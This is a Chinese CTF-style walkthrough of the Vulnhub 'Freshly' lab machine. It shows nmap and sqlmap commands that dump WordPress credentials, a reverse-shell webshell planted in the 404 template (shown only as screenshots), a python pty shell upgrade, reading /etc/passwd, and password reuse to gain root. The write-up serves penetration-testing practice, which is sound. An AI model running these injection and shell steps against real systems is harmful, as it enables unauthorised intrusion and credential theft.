Vulnhub靶机第六关

Vulnhub靶机 freshly
运行环境
Virtualbox
VM(运行会提示错误,给的解决链接已经404)
本靶机推荐使用Virtualbox搭建
说明
此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。
运行环境
将下载的OVA文件导入进Virtualbox即可。
将虚拟机用virtualbox打开后设置为桥接网卡
在这里插入图片描述
查看本机网卡找到对应的ip段使用nmap 扫描
命令:ipconfig /all|more
Nmap -sT 192.168.1.0/24
在这里插入图片描述
切换网络时ip会改变
访问主页
在这里插入图片描述
使用御剑扫描目录
在这里插入图片描述
发现登录页
在这里插入图片描述
使用sqlmap扫描
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 查看是否存在注入点
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 --dbs 查看数据库
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” --tables 查看数据表
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” --columns 查看字段
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” -C “username,password” --dump 查看字段内容
得到账户密码:admin SuperSecretPassword
在这里插入图片描述
登录后台
http://192.168.1.54:8080/wordpress/wp-login.php
在404模板写入反弹shell 的大马
在这里插入图片描述
开启nc监听
在这里插入图片描述
访问404.php
在这里插入图片描述
拿到shell
在这里插入图片描述
输入:python -c 'import pty;pty.spawn("/bin/bash")'得到一个交互式的shell
在这里插入图片描述
输入 cat /etc/passwd
在这里插入图片描述
输入su 尝试切换到root用户,尝试输入注入得到的密码:SuperSecretPassword 成功切换
在这里插入图片描述
但是根目录下都是乱码
输入: ls -lh --color=never 乱码恢复正常
在这里插入图片描述
提权成功

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值